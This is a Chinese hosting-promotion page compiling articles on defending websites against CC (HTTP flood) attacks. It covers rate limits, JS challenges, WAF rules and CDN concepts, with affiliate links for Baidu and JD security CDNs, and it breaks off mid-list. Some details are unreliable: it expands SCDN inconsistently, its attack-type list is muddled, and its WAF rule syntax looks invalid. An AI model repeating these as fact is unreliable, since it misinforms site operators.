防护方式有很多,这里只列了几个常用的,想要彻底解决CC攻击问题,可以详细咨询主机吧,我们有高防CDN、高防IP、高防服务器均可有效防御CC攻击。 #### CC攻击的原理是什么?如何做CC攻击防御策略 CC攻击的防范手段 CC攻击原理 攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器资源耗尽,一直到宕机崩溃。CC主要是用来攻击页面的,每个人都有这样的体验:当一个网页访问的人数特别多的时候,打开网页就慢了,CC就是模拟多个用户(多少线程就是多少用户)不停地进行访问那些需要大量数据操作(就是需要大量CPU时间)的页面,造成服务器资源的浪费,CPU长时间处于100%,永远都有处理不完的连接直至就网络拥塞,正常的访问被中止。 CC攻击防御策略 1.取消域名绑定 取消域名绑定后Web服务器的CPU能够马上恢复正常状态,通过IP进行访问连接一切正常。但是不足之处也很明显,取消或者更改域名对于别人的访问带来了不变,另外,对于针对IP的CC攻击它是无效的,就算更换域名攻击者发现之后,攻击者也会对新域名实施攻击。 2.更改Web端口 一般情况下Web服务器通过80端口对外提供服务,因此攻击者实施攻击就以默认的80端口进行攻击,所以,可以修改Web端口达到防CC攻击的目的。 3.IIS屏蔽IP 我们通过命令或在查看日志发现了CC攻击的源IP,就可以在IIS中设置屏蔽该IP对Web站点的访问,从而达到防范IIS攻击的目的。 CC攻击的防范手段 1.优化代码 尽可能使用缓存来存储重复的查询内容,减少重复的数据查询资源开销。减少复杂框架的调用,减少不必要的数据请求和处理逻辑。程序执行中,及时释放资源,比如及时关闭mysql连接,及时关闭memcache连接等,减少空连接消耗。 2.限制手段 对一些负载较高的程序增加前置条件判断,可行的判断方法如下: 必须具有网站签发的session信息才可以使用(可简单阻止程序发起的集中请求);必须具有正确的referer(可有效防止嵌入式代码的攻击);禁止一些客户端类型的请求(比如一些典型的不良蜘蛛特征);同一session多少秒内只能执行一次。 3.完善日志 尽可能完整保留访问日志。日志分析程序,能够尽快判断出异常访问,比如单一ip密集访问;比如特定url同比请求激增。 面对来势汹汹的CC攻击,其实最好的方式还是选择第三方的云安全厂商(就像我们)来解决问题。 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。百度云加速是市场占有率最高的云加速产品之一,正为数十万用户的近百万网站提供CDN、网络安全和SEO服务。具备1Tbps的压制能力的抗D中心,拥有自有DDoS/CC清洗算法,可有效帮助网站防御SYN Flood、UDP Flood、ICMP Flood、TCP Flood、Connections Flood、Proxy Flood、CC等常见的洪水攻击。从而彻底解决了中小型网站在面对DDoS攻击时预算不足的尴尬,也为所有防护网站的稳定运行提供保障。 #### CC攻击的成本贵吗(CC攻击防御成本如何) 相对于其他DDoS攻击方式,CC攻击的成本确实比较低。因为CC攻击主要是通过模拟多个客户端向服务器发送请求,从而达到消耗服务器资源的目的。这种攻击方式不需要攻击者拥有大量的僵尸网络或带宽资源,只需要一些基本的编程技能和代理服务器即可实现。因此,一些黑灰产团伙可能会使用CC攻击来攻击目标网站或服务器,以达到其不良目的。 防御CC攻击的成本与攻击者的攻击规模和防御措施有关。如果攻击者使用大量的僵尸网络或带宽资源进行攻击,那么防御者需要投入更多的资金和资源来购买或租用更多的带宽和计算资源,以应对攻击。此外,为了更好地防御CC攻击,一些防御者需要雇佣专业的技术人员来设计和部署防御系统,这也会增加防御成本。 在选择防御措施时,需要权衡成本和效果。一些高防服务器和CDN服务商提供了一定的CC攻击防护能力,但成本相对较高。一些低成本的防御措施,如购买一些基本的防火墙或防CC攻击的软件,也可能具有一定的防护效果。因此,在选择防御措施时,需要根据实际情况进行选择。 主机吧推荐使用高防CDN品牌: 百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 优惠链接https://zhujib.com/yunjiasu.html 京东云星盾SCDN 京东云星盾SCDN安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 优惠链接:https://zhujib.com/jdxingdun.html #### CC攻击的种类 CC攻击(DDoS攻击)是一种常见的网络攻击方式,它通过利用大量受感染的计算机或设备向目标服务器发送大量的数据包,导致服务器过载而无法正常工作。根据不同的攻击方式和攻击手段,CC攻击可以分为多种类型。 一、基于IP的CC攻击 基于IP的CC攻击是指攻击者使用同一个IP地址向目标服务器发送大量的数据包。这种攻击方式通常用于测试目标服务器的容量和性能,或者用于对目标服务器进行拒绝服务攻击。 二、基于端口的CC攻击 基于端口的CC攻击是指攻击者使用同一个端口号向目标服务器发送大量的数据包。这种攻击方式通常用于测试目标服务器的安全性,或者用于对目标服务器进行拒绝服务攻击。 三、基于流量的CC攻击 基于流量的CC攻击是指攻击者使用大量的恶意流量向目标服务器发送数据包。这种攻击方式通常用于对目标服务器进行拒绝服务攻击,从而使服务器无法正常工作。 四、基于DNS的CC攻击 基于DNS的CC攻击是指攻击者通过恶意DNS查询向目标服务器发送大量的数据包。这种攻击方式通常用于对目标服务器进行拒绝服务攻击,从而使服务器无法正常工作。 五、基于应用层的CC攻击 基于应用层的CC攻击是指攻击者通过恶意应用程序向目标服务器发送大量的数据包。这种攻击方式通常用于对目标服务器进行拒绝服务攻击,从而使服务器无法正常工作。 六、混合型CC攻击 混合型CC攻击是指同时使用多种不同的攻击方式和手段向目标服务器发送大量的数据包。这种攻击方式通常更加难以防范和应对,因为攻击者可以根据具体情况选择最有效的攻击方式和手段。 总之,CC攻击有多种不同类型和手段,每种类型都有其独特的特点和特征。了解这些类型可以帮助我们更好地理解和应对CC攻击,从而保护我们的网站和服务器不受攻击的影响。 #### cc攻击策略怎么设置 高了误杀大 低了拦截不住 在CC攻击防护策略中我们经常遇到设置低了防御不住,高了又误判一大堆,这确实是配置CC防护策略时最经典、也最令人头疼的问题。 别担心,我们来系统地梳理一下,如何像剥洋葱一样层层设置CC防护策略,既能有效阻击攻击,又能最大程度减少误伤。 核心思想:分层防御 + 精准画像 你不能只靠一个阈值打天下。一个完善的策略应该由松到紧、由宽到严,分为多层。 第一层:基础防护(低误判,用于过滤大部分低级攻击和脚本小子) 这一层的目的是用最小的代价挡住那些最明显的、自动化程度不高的攻击。 频率限制(Rate Limiting): 策略:针对单个IP在短时间(如1秒、10秒)内对特定URL(尤其是登录页、提交表单、API接口)的请求次数进行限制。 示例设置: /:login.php: 单个IP,每秒不超过5次。 /api/v1/submit: 单个IP,每秒不超过2次。 优点:精准打击高频行为,对正常用户几乎无感(哪个正常用户1秒内刷新5次登录页?)。 关键:不要全局限制,一定要针对关键、消耗资源的动态页面和API。 User-Agent检测: 策略:拦截或挑战(Challenge)那些User-Agent为空、明显是爬虫(如python-requests、Go-http-client)或非常见浏览器的请求。 优点:能过滤掉一大批“偷懒”的攻击脚本。 基础挑战(Challenge): 策略:对疑似恶意的IP(比如频率稍微超了一点)发起一次JS挑战(如Cloudflare的Under Attack Mode或5秒盾)。正常浏览器能自动通过,而很多简单脚本会失败。 优点:有效区分浏览器和简单脚本,误判率极低。 如果你的攻击连这一层都还没触发,说明你的阈值设得太高了! 第二层:高级防护(精准打击,用于应对中级攻击) 攻击者会用大量代理IP、低频率请求来绕过第一层防护。这时需要更智能的策略。 IP信誉库: 策略:集成威胁情报(如Cloudflare Threat Score,或其他IP信誉数据库)。自动拦截或严厉挑战来自已知数据中心、代理服务器、VPN或僵尸网络的IP。 示例:挑战所有威胁评分 > 50 的IP。 行为分析(重点!): 策略:这是对抗高级CC攻击的核心。你需要关注会话(Session) 级别的行为,而不是单个IP。 检测特征: 低速率分布式攻击:单个IP频率不高,但成百上千个IP同时访问同一个冷门URL。 无Referer或伪造Referer:大量请求缺少来源页面信息。 不接受Cookie:会话行为异常。 资源访问模式:只疯狂请求某个耗资源的API或数据库查询接口,而不加载页面上的CSS、JS、图片等静态资源(正常浏览器会加载)。 设置:在WAF(Web应用防火墙)中创建自定义规则。例如: (http.request.uri.path contains "/api/expensive_operation") and (not cf.client.bot) and (count ip.src) > 100) 解释:当对消耗资源的API接口的请求,来自超过100个不同的IP,且这些请求不是来自已知的友好爬虫时,触发防护动作。 动作:可以设置为挑战(Challenge) 或 JS验证,而不是直接拦截,以减少误判。 地区/国家封锁(谨慎使用): 策略:如果你的业务只面向特定国家(例如只做国内业务),直接封锁所有海外IP段的访问。这是对抗CC攻击的大杀器。 缺点:会误伤出国的正常用户。 第三层:紧急模式(宁错杀,不放过) 当攻击流量巨大,服务器已经濒临崩溃时,启用最终手段。 全局严格频率限制: 策略:设置一个非常低的全局频率阈值,例如每个IP每分钟最多请求60次整个网站。这会误伤爬虫和高频用户,但能保住服务器不死。 动作:直接拦截或返回429(Too Many Requests)状态码。 启用“5秒盾”或强力挑战: 策略:对所有访问网站动态内容的用户进行一次强力的JS计算挑战。能有效挡住所有非浏览器流量,给服务器喘息之机。 缺点:用户体验极差。 IP段封锁: 策略:实时分析攻击流量来源,发现主要来自某个IP段(如某个云服务商),直接封锁整个CIDR段。 方法:通过服务器日志或WAF日志实时分析,找出恶意IP的共性。 给你的具体操作建议(“搞了感觉被打死了还没阻拦”的解决方案) 立即检查并调低第一层的阈值: 不要从“每分钟成百上千次”开始设。从秒级和关键页面开始。 登录页:IP,每秒 > 3次 → 挑战 搜索页:IP,每秒 > 5次 → 挑战 任何API:IP,每秒 > 2次 → 挑战 先设置挑战(Challenge)而不是直接拦截(Block),观察效果,看误判情况。 善用“慢速攻击”防护: 有些CC攻击是慢速的,保持连接耗尽你的资源。确保你的WAF或服务器(如Nginx)配置了 client_body_timeout、client_header_timeout 等参数。 查看日志,分析攻击特征: 你到底是怎么死的? 是CPU爆了?带宽满了?数据库慢了? 去WAF(如Cloudflare)的安全事件中心或服务器访问日志里看: 被攻击的具体URL是哪个?把它作为防护规则的核心。 攻击IP有哪些?有没有共同特征?(都来自某个ASN?User-Agent都一样?) 攻击的频率和速率到底是多少?用这个数据来设置你的阈值。 使用专业的 防护工具: 如果用的是基础版的防御服务,考虑升级到百度云防护企业版,会有更精细的自定义规则和分析功能,支持AI智能识别,支持侧滑验证、JS验证、API安全、动态识别等高级功能。 如果流量巨大,考虑用高防IP服务(如速度网络高防IP),它们的功能更强大。 切勿单纯依赖服务器软件(如Nginx的limit_req)来做全量CC防护,它无法区分IP背后是人还是脚本,很容易被代理IP打穿。 总结:一个良好的策略流程 监控发现:通过监控报警发现异常(CPU、带宽、503错误激增)。 日志分析:立即查看日志,确定攻击目标、源IP特征、请求频率。 创建规则:根据分析结果,在WAF中创建精准的自定义规则(针对URL、IP信誉、行为等)。 启动挑战:先使用JS挑战、验证码等动作,而不是直接封锁,观察效果。 迭代调整:根据防护效果和误报情况,微调规则阈值和动作。 应急方案:准备好紧急模式的开关(如全局频率限制、地区封锁),在危急时刻一键开启。 从你的描述来看,问题很可能出在策略不够分层、阈值设置过于宽松、且没有针对攻击特征(如特定URL)进行精准防护。从今天起,放弃“一个数字搞定所有”的想法,开始构建你的分层防御体系吧 百度云防护 Web应用防火墙WAF 防黑客入侵 CC攻击拦截 网络爬虫拦截[出售] ¥299 ¥399 库存:9.9k 已售:99.9k 人气:9.2 #### cc攻击跟dd攻击哪个可怕 CC攻击和DDoS攻击各有其独特的威胁性,具体哪个更“可怕”取决于攻击目标的环境和防御能力。以下是两者的对比分析: 1. 攻击原理与目标 CC攻击(Challenge Collapsar/HTTP Flood) 原理:针对应用层(如HTTP/HTTPS),通过模拟大量合法用户的请求(例如频繁刷新页面、提交表单),耗尽服务器资源(如数据库连接、CPU、内存)。 目标:使服务器因资源过载而无法响应正常用户请求。 DDoS攻击(分布式拒绝服务) 原理:利用分布式的僵尸网络(Botnet),从多个源头向目标发送海量流量(如SYN Flood、UDP Flood),占用目标带宽或基础设施资源。 目标:通过饱和网络带宽或瘫痪关键设备(如防火墙、路由器),导致服务完全不可用。 2. 攻击特点对比 维度CC攻击DDoS攻击攻击层级应用层(Layer 7)网络层/传输层(Layer 3-4)为主流量特征模拟正常请求,流量较小但高频率流量规模巨大,可能混杂多种协议隐蔽性高(难与传统用户区分)低(异常流量易被检测)攻击成本较低(无需庞大僵尸网络)较高(依赖Botnet或租用攻击资源)防御难度需精细化应用层防护需带宽扩容或分布式流量清洗 3. 哪种更可怕?场景分析 CC攻击的威胁场景 适用目标:依赖动态内容处理的网站(如电商、论坛)、API服务。 可怕之处: 直接穿透传统防火墙,难以通过IP封禁缓解。 精准消耗服务器资源,少量请求即可导致瘫痪(如击穿数据库连接池)。 DDoS攻击的威胁场景 适用目标:带宽有限的网站、在线游戏服务器、金融系统。 可怕之处: 短时间内造成全网瘫痪,恢复依赖外部防护(如云清洗)。 攻击规模可达Tbps级别,远超普通企业防御能力。 4. 防御策略 应对CC攻击: 应用层限流(如限制单个IP的请求频率)。 使用WAF(Web应用防火墙)识别异常行为。 部署人机验证(如CAPTCHA)或动态令牌。 应对DDoS攻击: 与云服务商合作(如AWS Shield、阿里云高防IP)。 部署Anycast网络分散流量。 配置网络设备过滤异常流量(如SYN Cookie)。 结论 若目标防御薄弱:DDoS攻击更可怕,因其能瞬间瘫痪服务且难以自主缓解。 若目标依赖应用层逻辑:CC攻击更可怕,因其隐蔽性强,针对性高。 实际场景中,攻击者可能结合两者(如混合层DDoS),因此需多层防护策略结合。 #### CC攻击防御手段集合 CC攻击(Challenge Collapsar)是分布式拒绝服务(DDoS)攻击的一种类型,通过向目标网络服务器发送伪造的HTTP请求,消耗服务器资源,导致服务不可用。以下是云加速收集的绝大多数CC攻击防御方法: 一、快速恢复法: 1.关闭端口 把业务对外端口全关了,比如网站业务80、443端口关闭,这样服务器就可以快速恢复正常,一般的云服务器商都有安全组,可以在安全组设置。这样做的原因是避免因CC攻击影响服务器软件运行及程序正常,同时也可以让我们在关闭端口的这段时间好应对CC攻击,我们到时只需要把端口重新开启就行了。 2.域名解析走 即把域名解析的服务器IP解析至别的地方,让CC攻击无法通过域名请求进源服务器,这样做的原因还是想快速恢复网站,但解析一般生效较慢,而且把IP解析到别的地方,到时更新解析回来也是有延迟,效果没有上面第一个方法好。 二、程序应对法: 1.网站页面静态化 一般为说静态网页可以减少系统资源消耗,提高抗攻击能力,当然这个效果只能说有点效果,但效果不是很大。 2.使用缓存技术 网站使用缓存技术,可以减少服务器请求数量,有一定的防御CC攻击作用。 3.限制请求频率 在网站程序实施限流策略,限制来自同一IP地址的请求频率,避免单个用户或机器发起过多请求,有一定的防御CC攻击作用。 三、软件防护法 1.安装安全狗 安全狗是一款免费的服务器安全软件,只需要安装在服务器上运行即可,不过安全狗只能防御小型的CC攻击,对于那些大流量、分布式的CC攻击,安全狗是无能为力的。 2.安装宝塔防火墙WAF 这是一个收费的防火墙,需要另买一台服务器安装,而且配置不能低,功能上还是挺强大的,不过价格不便宜,最基础版的999元一年,总体上成本相对高,而且受限于单台服务器配置原因,整体防御能力比较低,防御中小型CC攻击没问题。 3.ningx防火墙 这是一个免费的防火墙,只要装有ningx都可以免费安装,不过CC防御效果非常差,甚至可以说接近没有。 四、安全产品防御法 以上方法都只能做些简单的CC攻击防御,需要做到安全可靠的,还得专业的防御产品。 1.高防服务器 顾名思义高防御的服务器,高防服务器拥有强大的硬件清洗设备,不仅可以防御DDOS攻击,还可以防御CC攻击,是很多公司防御流量型攻击的主要方式,当然高防服务器也不是无敌,遇到超过防御峰值的DDOS攻击一样会挂,同时一些机房可能对超量攻击封禁比较长,还有一些高防服务器在应对CC攻击的时候,比较乏力,所以在选择高防服务器的时候要谨慎。 2.高防IP 跟上面一样,高防御的IP,高防IP通过转发业务,可以清洗DDOS攻击流量,对CC攻击效果也非常好,可以对CC攻击流量进行丢弃,非常好用。缺点是并不便宜,而且高防IP的DDOS防御量一般很贵,100G的高防IP,一个月几千块是很正常的,当然如果你真被非常大量的攻击的话,用高防IP或者高防服务器是不错的选对。 3.高防CDN 高防御的CDN服务,高防CDN利用分布式的方式防御,可以有效拦截CC攻击,还可以给网站加速,一些高防CDN还提供WEB应用防火墙,可以有效拦截黑客漏洞攻击,是网站防御CC攻击必选的产品,比如百度云防护、京东云星盾就是这类产品。 当然,高防CDN也不是没有缺点,比如套餐加速流量比较少,DDOS防御低,限制域名配置等。但其价格相对前面两个,要便宜很多,适合被中小型攻击,又不上高防IP的场景。 高防CDN主机吧推荐使用百度云防护、京东云星盾产品 百度云防护:https://www.yunjiasu.cc/shangdian/81.html 京东云星盾:https://www.yunjiasu.cc/shangdian/59.html #### CC攻击防御方法 随着互联网的普及,网络安全问题日益引起人们的关注。而CC攻击作为最常见的网络攻击方式之一,给企业和个人网站带来了严重的威胁。为了防御CC攻击,我们需要了解其原理及防御方法。 CC攻击的原理 CC攻击通过伪造请求头,模拟多个用户访问网站,占用服务器的资源,导致服务器的性能急剧下降,甚至无法正常运行。 CC攻击的防御方法 CC攻击防御方法有很多种,以下介绍几种常见的方法: 过滤请求头 过滤请求头可以避免攻击者利用请求头进行攻击,同时也可以减少服务器的资源消耗。例如,过滤User-Agent、IP地址等请求头。 增加缓存大小 增加缓存大小可以减少服务器需要处理的请求数量,从而减轻服务器的负担。另外,通过缓存静态文件,如图片、CSS文件等,可以减少服务器需要处理的请求数量,从而提高服务器的响应速度。 使用安全认证 通过使用HTTPS协议和安全认证,可以避免网站被恶意攻击者篡改和伪造。同时,还可以保护用户隐私和数据安全。 控制访问速度 攻击者常常利用多线程技术进行CC攻击。因此,通过控制访问速度,可以限制单个IP地址的请求频率,从而避免服务器被过度占用。例如,设置限制每个IP地址的请求频率、限制请求速率等。 配置防火墙 配置防火墙可以有效地阻止CC攻击。通过设置过滤规则,可以过滤掉未经授权的IP地址和请求,从而保护服务器的安全。 实战中的应用案例 为了更好地说明CC攻击的防御方法,我们来看一个实战中的应用案例。 某网站在某段时间内频繁遭受CC攻击,导致服务器的性能急剧下降。为了防御攻击,该网站采取了以下措施: 过滤请求头:过滤了User-Agent、IP地址等请求头。 控制访问速度:限制每个IP地址的请求频率为每秒2个。 配置防火墙:设置过滤规则,过滤掉来自特定IP地址的请求。 采取以上措施后,CC攻击对该网站的威胁得到了有效防御。网站服务器性能逐渐恢复,业务正常运行。 结论 本文介绍了CC攻击的原理及防御方法。通过过滤请求头、增加缓存大小、使用安全认证、控制访问速度以及配置防火墙等措施,可以有效地防御CC攻击。因此,为了保障网站的安全和稳定,建议企业和个人网站采取相应的防御措施。同时,也需要加强安全意识,定期检查和更新网站的安全设置,以保障用户的隐私和数据安全。 #### CC攻击防护策略大全 针对CC攻击(Challenge Collapsar,一种应用层DDoS攻击)的防御策略需要从多个层面进行综合防护。以下是一些常见的防御措施: 1. 流量分析与频率限制 IP请求频率限制对单个IP在单位时间内的请求数进行阈值限制(如Nginx的limit_req模块、Cloudflare速率规则)。 会话(Session)限制限制同一用户会话的请求频率,防止通过伪造Session绕过IP限制。 API接口限流对关键API接口设置访问频率限制(如令牌桶算法、漏桶算法)。 2. 人机验证机制 验证码(CAPTCHA)在可疑流量出现时,弹出验证码验证用户真实性(如Google reCAPTCHA)。 行为分析通过鼠标轨迹、点击模式等行为特征区分正常用户与机器人。 JavaScript挑战要求客户端执行JavaScript计算后再发起请求(许多自动化工具无法处理)。 3. Web应用防火墙(WAF) 规则匹配配置WAF规则识别异常请求(如User-Agent异常、高频相似URL访问)。 IP信誉库集成威胁情报,自动拦截已知恶意IP或代理池。 动态指纹检测分析HTTP头、TLS指纹等特征识别攻击工具。 4. 负载均衡与分布式架构 CDN加速通过CDN分散流量,隐藏真实服务器IP,并缓存静态内容减少回源压力。 负载均衡器将流量分发到多台服务器,避免单点过载,并设置健康检查剔除异常节点。 弹性扩容云环境下可自动扩展资源应对突发流量(需结合成本考量)。 5. 协议与连接优化 连接数限制限制单个IP的并发连接数(如Nginx的limit_conn模块)。 缩短超时时间减少TCP连接和HTTP请求的超时等待,快速释放资源。 SYN Cookie防护防止TCP半连接耗尽资源(针对混合SYN Flood攻击)。 6. 业务逻辑防护 关键操作二次验证对登录、支付等关键功能增加短信/邮箱验证。 动态资源保护避免直接暴露数据库查询接口,对动态请求进行权限校验。 缓存静态内容使用Redis、Memcached缓存高频访问数据,减少后端压力。 7. 日志监控与应急响应 实时监控监控服务器带宽、连接数、响应时间等指标,设置阈值告警。 日志分析分析访问日志,识别异常模式(如大量404请求、同一URL高频访问)。 应急切换准备备用服务器或云服务,在攻击时快速切换流量。 8. 其他高级策略 AI/机器学习训练模型识别正常流量与攻击流量的行为差异。 IP黑白名单手动或自动维护可信IP列表,拦截高危地区IP。 协议合规性检查过滤不符合HTTP标准的畸形请求(如异常Header、非法方法)。 总结 CC攻击防御需采用分层策略,结合流量清洗、行为分析、资源隔离和业务加固。对于中小型网站,可优先使用CDN+WAF组合(如百度云防护WAF、京东云星盾SCDN);大型系统需部署分布式防护架构,并结合自动化分析工具快速响应。 百度云防护介绍:https://www.zhujib.com/shop/26864.html 京东云星盾介绍:https://www.zhujib.com/shop/20576.html #### CC防御中的QPS值是什么意思? 购买过高防产品的站长一定注意到,有一个配置是CC防御值,而这个防御值一般都是几万十几万QPS,而这个QPS是什么意思呢? CC防御的QPS是指每秒查询率,即是服务器每秒能够响应的请求次数; 而CC攻击一般是通过大量非法请求,导致服务器CPU和内存占满,最终目标是网站打不开,而CC防御的QPS值是指这个防御最高支持防护这么高的请求值。 #### cdn+云安全的产品推荐 今年百度云加速涨价了,导致很多站长都在同类的安全CDN进行替代,为此主机吧专门找了些性价还算可以产品,推荐给大家。 1.京东云星盾 京东云星盾(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 最低配的基础版这边代理价810一年,不过不防御CC攻击,如需要防御CC攻击需要使用商业版,价格1710元一年: 流量:5TB 协议:HTTP/HTTPS 域名接入方式:CNAME 可添加域名总数:1 应用攻击防护:支持 WAF自定义规则:20条 最大可缓存文件:200MB 自定义页面规则:20条 免费通用证书:支持 自定义上传证书:2 技术支持:客服工单 专用证书:1 DDoS攻击防护(L4):5Gbps CC攻击标准防护:自动防护 True-Client-IP标头:不支持 CC攻击高级防护:不支持 BOT机器人识别:不支持 速率限制Rate Limiting:不支持 HTTP2优化:不支持 域名扩展包:不支持 正则表达式:不支持 Websocket:不支持 DDoS攻击弹性防护:不支持 日志推送服务:不支持 缺点就是流量比百度云加速低,适合平时流量比较低的网站,优点是功能比百度强大,节点比百度多,而且稳定。 优惠地址:https://zhujib.com/jdxingdun.html 2.快御云安全CDN 小公司开的SCDN,但是CC攻击防御体验非常好,可以做到无感防御,功能也强大,比百度云加速要好很多,缺点是只有一个节点,边缘加速差点,不过带宽非常高,可支持1G以下峰值的访问,优而且支持多个域名绑定,CDN流量也还可以。 最基础的版本1290元一年: 支持域名数:3个 支持泛绑定 支持缓存加速 支持智能压缩 加速流量:600G/月 DDoS云防护:20Gbps CC云防御:1000IP/小时 网站流量高的可以用商务版一年5990元: 支持域名数:5个 泛绑定:支持 缓存加速:支持 智能压缩:支持 加速流量:3T/月 DDoS云防护:60Gbps CC云防护:3000IP/小时 自定义CC规则:支持 海外封禁:支持 IP黑白名单:支持 防盗链:支持 HTTPS:支持 WebSocket:支持 优惠地址:https://sudu.cdun.cn/accelerate 好了,以上就是一些性价比还算不错的安全CDN了,结合安全防御、网站加速一体,主机吧用过非常可以,防御能力非常强。 #### CDN、DNS、ADN、SCDN、DCDN、ECDN、PCDN、融合CDN简单介绍 CDN(Content Delivery Network) CDN的全称是Content Delivery Network,即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输得更接近用户的“家门口”。这样,用户就能就近取得所需内容,解决了Internet网络拥塞的状况,提高了用户访问网站的响应速度与网站的可用性。 DNS(Domain Name System) DNS(Domain Name System),即域名系统,它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网,而不用去记住能够被机器直接读取的IP数串。 ADN(Application Delivery Network) ADN(Application Delivery Network),即应用程序交付网络,它是一种新型的网络服务,主要用于向最终用户提供高质量的应用程序体验。ADN通过在现有的互联网基础设施之上增加一层新的抽象层,使得应用程序能够在任何地方运行,并且能够根据用户的位置和网络条件进行优化。 SCDN(Server-Side CDN) SCDN(Server-Side CDN),即服务器端CDN,它是一种在服务器端实现的CDN解决方案。与传统的客户端CDN(如浏览器缓存)不同,SCDN通过在服务器端缓存内容,并在用户请求时从最近的服务器返回内容,从而减少了网络延迟和带宽消耗。 DCDN(Dynamic Content Delivery Network) DCDN(Dynamic Content Delivery Network),即动态内容分发网络,它是一种专门针对动态内容的CDN解决方案。与传统的CDN主要服务于静态内容不同,DCDN能够实时地将动态内容分发到全球范围内的用户,从而提高了动态内容的访问速度和可用性。 ECDN(Enterprise Content Delivery Network) ECDN(Enterprise Content Delivery Network),即企业内容分发网络,它是一种专为企业设计的CDN解决方案。ECDN能够帮助企业解决内部网络的压力,提高企业内部应用的访问速度和可用性。 PCDN(Peer-to-Peer Content Delivery Network) PCDN(Peer-to-Peer Content Delivery Network),即P2P内容分发网络,它是一种基于P2P技术的内容分发网络解决方案。PCDN通过利用边缘网络的闲置资源,实现了低成本、高效率的内容分发。 融合CDN 融合CDN是在传统CDN基础上,通过技术手段融合各主流CDN厂商的优质节点,以实现全业务处理能力的智能调度加速管理服务。融合CDN打破了单个CDN厂商的节点资源以及调度能力有限的困境,突破了地域时间以及不同运营商的限制,通过强大的智能调度策略来综合利用上述资源来解决实际场景中的问题,可以带来更加优质的服务效果、更加稳定的质量和相对降低的服务成本。 #### CDN和对象存储的区别 CDN(内容分发网络)和对象存储是云计算中两个密切相关但又功能不同的核心服务,它们经常配合使用,但解决的问题截然不同。以下是它们的核心区别: 特性对象存储CDN核心功能海量、非结构化数据的持久化存储将内容快速分发给全球用户的网络解决的问题数据存储成本、扩展性、持久性用户访问速度慢、源站压力大、网络拥塞部署位置集中在少数几个数据中心全球分布的边缘节点(靠近用户)数据持久性是(设计目标就是长期可靠存储)否(缓存临时数据,源站才是持久存储)访问方式通过 API (HTTP/S) 或 SDK 读写用户通过浏览器或 App 透明访问缓存内容典型用例图片、视频、文档、备份、日志等存储加速网站静态资源、视频流、软件下载等性能关注点读写吞吐量、请求延迟、一致性终端用户感知的加载速度、缓存命中率计费模式存储量 + 请求次数 + 流出流量流量 + 请求次数数据生命周期可设置长期存储或自动过期策略缓存内容根据策略过期(TTL 控制)典型厂商百度云 BOS, 阿里云 OSS, 腾讯云 COS百度云 CDN, 腾讯云 CDN, 阿里云 CDN 更深入的解释 对象存储: 本质: 它是一个海量、可扩展、低成本的云存储服务。设计用来存储海量的非结构化数据(图片、视频、文档、日志、备份等)。 核心价值: 无限扩展: 理论上存储容量无上限。 高持久性: 数据通常跨多个设备或数据中心冗余存储,保证极高的数据可靠性。 低成本: 相比传统存储方案,单位存储成本极低。 易访问: 通过标准的 HTTP/HTTPS API (RESTful) 访问数据,适合互联网应用。 部署: 数据物理存储在云服务商提供的少数大型数据中心里。 缺点: 如果用户离存储该数据的中心很远,访问延迟可能会比较高。 CDN: 本质: 它是一个分布式网络基础设施,由遍布全球的大量边缘节点组成。 核心价值: 加速访问: 将内容的副本缓存到离最终用户地理位置最近的边缘节点。用户请求时,直接从最近的节点获取内容,显著降低延迟,提高加载速度。 减轻源站负载: 大部分用户请求由边缘节点响应,大大减少了回源到原始服务器(如对象存储桶、Web服务器)的流量和请求压力。 提升可用性: 分布式架构有助于抵御局部网络故障或流量激增(如DDoS攻击)。 节省带宽成本: 对于源站(尤其是云服务),减少了流出到互联网的流量,这部分流量通常比CDN流量贵。 工作原理: 用户首次请求一个资源。 CDN检查其边缘节点是否有缓存(缓存命中)。 如果命中,直接从边缘节点返回给用户(最快)。 如果未命中,CDN节点回源站(如对象存储桶)拉取资源,缓存到本地,然后返回给用户。 后续用户请求相同资源时,如果缓存未过期(由TTL控制),则直接从边缘节点返回。 部署: 节点部署在全球各地的网络边缘(ISP接入点附近)。 关键: CDN本身不负责永久存储原始数据,它只是一个智能的缓存和分发层。原始数据仍然持久存储在源站(如对象存储、Web服务器)。 它们如何协同工作(最常见场景) 原始存储: 你将网站/应用的静态资源(图片、CSS、JS、视频等)上传到对象存储中。 CDN 配置: 你配置一个 CDN 服务,将其源站指向你的对象存储桶。 用户访问: 用户访问你的网站,请求一个图片。 CDN 处理: CDN 检查离用户最近的边缘节点是否有该图片的缓存。 如果有(命中),直接快速返回给用户。 如果没有(未命中),CDN 节点回源到你的对象存储桶拉取图片。 CDN 节点将图片缓存起来(供后续请求使用)。 CDN 节点将图片返回给用户。 效果: 用户:获得了极快的加载速度(因为从近处的 CDN 节点获取)。 对象存储:只承担了未命中时的回源请求和流量,压力大大减小。 你的网站:整体性能、用户体验提升,能承受更大流量。 总结 对象存储是“仓库”:用于安全、持久、低成本地存放你的原始数据(尤其是海量静态文件)。 CDN是“快递网络+本地配送点”:用于将这些数据快速、高效地分发到全球用户附近,提升访问速度,减轻仓库(源站)压力。 简单来说:对象存储解决“数据存哪里”的问题,CDN解决“数据如何快速送到用户手里”的问题。 它们是构建高性能、可扩展互联网应用(尤其是涉及大量静态内容的)的黄金搭档。 #### CDN如何防范恶意刷流量 最近,被恶意刷流量的站长有点多,其中最主要的是一些购买流量包,拥有后付费的大厂CDN居多。 今天主机吧以站长的身份来谈谈CDN如何防范恶意刷流量。 1. 